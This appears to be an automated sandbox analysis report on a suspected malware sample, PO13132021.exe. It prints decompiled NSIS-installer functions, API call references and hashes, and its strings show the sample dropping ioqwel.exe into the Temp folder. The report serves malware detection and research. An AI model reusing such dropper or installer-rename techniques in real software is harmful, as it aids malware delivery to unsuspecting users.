								_push(1);
								_t40 =  &_v8; // 0x4236e0
								E004046BB(_a4,  *_t40);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x424748, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x424748, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x41fd1c != 0) {
						goto L25;
					} else {
						_t112 =  *0x420528 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004042CE(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404697();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x423f1c; // 0x74a557
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x424798;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E004043E2;
				E004042AC(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E004042AC(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004042CE( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E004042E1(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x424754 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				 *0x41fd1c = 0;
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x41fd1c = 0;
				return 0;
			}

0x00404427
0x0040454c
0x004045a8
0x004045ac
0x00404679
0x0040467b
0x0040467b
0x00404681
0x00404681
0x00404684
0x00000000
0x0040468b
0x004045ba
0x004045bc
0x004045c6
0x004045d1
0x004045d4
0x004045d7
0x004045e2
0x004045e5
0x004045ec
0x004045fa
0x00404612
0x00404614
0x00404616
0x0040461c
0x0040462b
0x0040462d
0x0040462d
0x004045ec
0x00404637
0x00000000
0x00404642
0x00404646
0x00404657
0x00404657
0x0040465d
0x0040466b
0x0040466b
0x00000000
0x0040466f
0x00404637
0x00404557
0x00000000
0x0040456b
0x00404571
0x00404577
0x00000000
0x00000000
0x0040459c
0x0040459e
0x004045a3
0x00000000
0x004045a3
0x00404557
0x0040442d
0x00404430
0x00404435
0x00404437
0x00404446
0x00404446
0x0040444d
0x00404450
0x00404452
0x00404457
0x00404460
0x00404466
0x00404472
0x00404475
0x0040447e
0x00404483
0x00404486
0x0040448b
0x004044a2
0x004044a9
0x004044bc
0x004044bf
0x004044d4
0x004044db
0x004044e0
0x004044e5
0x004044e5
0x004044f4
0x00404503
0x00404515
0x0040451a
0x0040452a
0x0040452c
0x00000000

APIs

CheckDlgButton.USER32 ref: 004044A2
GetDlgItem.USER32 ref: 004044B6
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004044D4
GetSysColor.USER32(?), ref: 004044E5
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004044F4
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404503
lstrlenA.KERNEL32(?), ref: 00404506
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404515
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040452A
GetDlgItem.USER32 ref: 0040458C
SendMessageA.USER32(00000000), ref: 0040458F
GetDlgItem.USER32 ref: 004045BA
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004045FA
LoadCursorA.USER32 ref: 00404609
SetCursor.USER32(00000000), ref: 00404612
LoadCursorA.USER32 ref: 00404628
SetCursor.USER32(00000000), ref: 0040462B
SendMessageA.USER32(00000111,00000001,00000000), ref: 00404657
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040466B

Strings

N, xrefs: 004045A8
6B, xrefs: 00404616

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N$6B
API String ID: 3103080414-649610290
Opcode ID: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
Instruction ID: 4db3d1b8578fb28e8129a2e139a0a5bbbdeef9899b51b491bef805f45c6f40d7
Opcode Fuzzy Hash: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
Instruction Fuzzy Hash: 5761B2B1A00209BFDB109F61DD45F6A3B69EB85310F11843AFB01BA2D1D7BD9952CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00405E97, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 129
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E97(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x422ae0 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x422ee0
					_t12 = GetShortPathNameA( *_t2, 0x422ee0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4226e0, "%s=%s\r\n", 0x422ae0, 0x422ee0);
						_t53 = _t52 + 0x10;
						E004062BB(_t37, 0x400, 0x422ee0, 0x422ee0,  *((intOrPtr*)( *0x424754 + 0x128)));
						_t12 = E00405DC1(0x422ee0, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E39(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D26(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D26(_t38, _t21 + 0xa, 0x40a3f0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405D7C(_t24 + _t46, 0x4226e0, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E68(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DC1(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x422ae0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405e97
0x00405ea0
0x00405ea7
0x00405ebb
0x00405ee3
0x00405eea
0x00405eee
0x00405ef2
0x00405f12
0x00405f19
0x00405f23
0x00405f30
0x00405f35
0x00405f3a
0x00405f3e
0x00405f4d
0x00405f4f
0x00405f5c
0x00405f60
0x00405ffb
0x00000000
0x00405f76
0x00405f83
0x00405fa7
0x00405fab
0x00405fca
0x00405fce
0x00405fce
0x00405fd0
0x00405fd9
0x00405fe4
0x00405fef
0x00405ff5
0x00000000
0x00405ff5
0x00405fad
0x00405fb0
0x00405fbb
0x00405fb7
0x00405fb9
0x00405fba
0x00405fba
0x00405fc2
0x00405fc4
0x00000000
0x00405fc4
0x00405f8e
0x00405f94
0x00000000
0x00405f94
0x00405f60
0x00405f3e
0x00405ebd
0x00405ec8
0x00405ed1
0x00405ed5
0x00000000
0x00000000
0x00405ed5
0x00406006

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406028,?,?), ref: 00405EC8
GetShortPathNameA.KERNEL32 ref: 00405ED1

Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68

GetShortPathNameA.KERNEL32 ref: 00405EEE
wsprintfA.USER32 ref: 00405F0C
GetFileSize.KERNEL32(00000000,00000000,00422EE0,C0000000,00000004,00422EE0,?,?,?,?,?), ref: 00405F47
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F56
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F8E
SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,004226E0,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00405FE4
GlobalFree.KERNEL32 ref: 00405FF5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405FFC

Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\PO13132021.exe,80000000,00000003), ref: 00405DC5
Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7

Strings

*B, xrefs: 00405EB6
[Rename], xrefs: 00405F76, 00405F88
.B, xrefs: 00405EEA
%s=%s, xrefs: 00405F02
.B, xrefs: 00405EE3

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]$*B$.B$.B
API String ID: 2171350718-3836630945
Opcode ID: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
Instruction ID: e10df20c38e6db669e3e204b33f1f32e55eddbf12f2a20f16207bac721f49ac6
Opcode Fuzzy Hash: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
Instruction Fuzzy Hash: EA310331200B167BD2206B659E4DF6B3A5CDF45758F14043BF942F62D2EE7CE8118AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x424754;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423f40, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x424748;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00423F40,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
Instruction ID: db002e3ba225c6bd58a8671fff368fb1669b339ad4166f4ebb51648b269c9ea2
Opcode Fuzzy Hash: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
Instruction Fuzzy Hash: 51419D71800249AFCF058FA5DE459AF7FB9FF45314F00802AF991AA1A0C738DA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004062BB, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004062BB(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x423f1c; // 0x74a557
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x424798;
				_t39 = 0x4236e0;
				_t90 = 0x4236e0;
				if(_a4 >= 0x4236e0 && _a4 - 0x4236e0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004062BB(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x4236e0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x425000;
							E00406228(_t90, (_t97 << 0xa) + 0x425000);
						} else {
							E00406186(_t90,  *0x424748);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406503(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42474c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x4247e4;
						if( *0x4247e4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x424744;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x424748,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x424748,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E0040610F((_t80 & 0x0000003f) +  *0x424798, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x424798, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062BB(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E00406228(_a4, _t39);
			}

0x004062bb
0x004062bb
0x004062bb
0x004062c1
0x004062c6
0x004062c8
0x004062d7
0x004062d7
0x004062df
0x004062e0
0x004062e1
0x004062e2
0x004062e5
0x004062ed
0x004062ef
0x00406306
0x00406309
0x00406309
0x004064e0
0x004064e0
0x004064e4
0x00000000
0x00000000
0x00406316
0x0040631c
0x00000000
0x00000000
0x00406322
0x00406323
0x00406326
0x00406329
0x004064d3
0x004064dd
0x004064df
0x004064df
0x004064d5
0x004064d7
0x004064d9
0x004064da
0x004064da
0x00000000
0x004064d3
0x0040632f
0x00406333
0x00406343
0x0040634a
0x0040634d
0x00406355
0x00406358
0x0040635f
0x00406360
0x00406363
0x00406480
0x00406483
0x004064b3
0x004064b6
0x004064bb
0x004064bf
0x004064bf
0x004064c4
0x004064ca
0x004064cc
0x00000000
0x004064cc
0x00406485
0x00406488
0x0040649d
0x004064a4
0x0040648a
0x00406491
0x00406491
0x004064ac
0x004064af
0x00406478
0x00406479
0x00406479
0x00000000
0x004064af
0x00406369
0x00406370
0x00406372
0x00406373
0x0040638d
0x0040638d
0x00406394
0x00406394
0x0040639b
0x0040639f
0x0040639f
0x004063a0
0x004063a2
0x004063db
0x004063de
0x004063ee
0x004063f1
0x004063f9
0x004063ff
0x004063ff
0x0040645e
0x0040645e
0x00406460
0x00000000
0x00000000
0x00406403
0x0040640a
0x0040640b
0x0040640d
0x00406427
0x00406435
0x0040643b
0x0040643d
0x0040645b
0x0040645b
0x0040645b
0x00000000
0x0040645b
0x00406443
0x0040644c
0x0040644f
0x00406455
0x00406459
0x00000000
0x00000000
0x00000000
0x00406459
0x0040640f
0x00406412
0x00000000
0x00000000
0x00406421
0x00406423
0x00406425
0x00000000
0x00000000
0x00000000
0x00406425
0x00000000
0x0040645e
0x004063e6
0x00000000
0x004063a4
0x004063bf
0x004063c4
0x004063c7
0x00406467
0x00406467
0x0040646b
0x00406473
0x00406473
0x00000000
0x0040646b
0x004063d1
0x00406462
0x00406462
0x00406465
0x00000000
0x00000000
0x00000000
0x00406465
0x004063a2
0x00406375
0x00406379
0x00000000
0x00000000
0x0040637b
0x0040637f
0x00000000
0x00000000
0x00406381
0x00406385
0x00000000
0x00406387
0x00406387
0x00000000
0x00406387
0x00406385
0x004064ea
0x004064f4
0x00406500
0x00406500
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 004063E6
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,00000400,?,00420530,00000000,00405387,00420530,00000000), ref: 004063F9
SHGetSpecialFolderLocation.SHELL32(00405387,00000000,?,00420530,00000000,00405387,00420530,00000000), ref: 00406435
SHGetPathFromIDListA.SHELL32(00000000,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s), ref: 00406443
CoTaskMemFree.OLE32(00000000), ref: 0040644F
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,?,00420530,00000000,00405387,00420530,00000000,00000000,00000000,00000000), ref: 004064C5

Strings

C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s, xrefs: 004062E5, 004063B2, 004063B3, 004063B4, 004063D0, 004063E5, 004063F8, 00406414, 0040643F, 00406472, 00406478, 00406490, 004064A3, 004064BE, 004064C4, 004064CC, 004064F6
Software\Microsoft\Windows\CurrentVersion, xrefs: 004063B5
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040646D

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-953666765
Opcode ID: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
Instruction ID: f83f29d570338ae078c2f0a770e3e6ec7f31d765c13aaba4f9587f8cbfb2a84b
Opcode Fuzzy Hash: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
Instruction Fuzzy Hash: 22610071A00214AEDF209F64D984BBA3BA4EB55714F12413FE913BA2D1C37C8962CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00406503, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406503(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C2D(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405BEB("*?|<>/\":", _t5))) == 0) {
							E00405D7C(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00406505
0x0040650d
0x00406521
0x00406521
0x00406527
0x00406534
0x00406534
0x00406535
0x00406537
0x0040653b
0x0040653d
0x00406546
0x00406548
0x00406562
0x0040656a
0x0040656a
0x0040656f
0x00406571
0x00406573
0x00406577
0x00406578
0x0040657b
0x00406583
0x00406585
0x00406589
0x00000000
0x00000000
0x0040658f
0x00406594
0x00000000
0x00000000
0x00000000
0x00406594
0x00406599

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO13132021.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040655B
CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406568
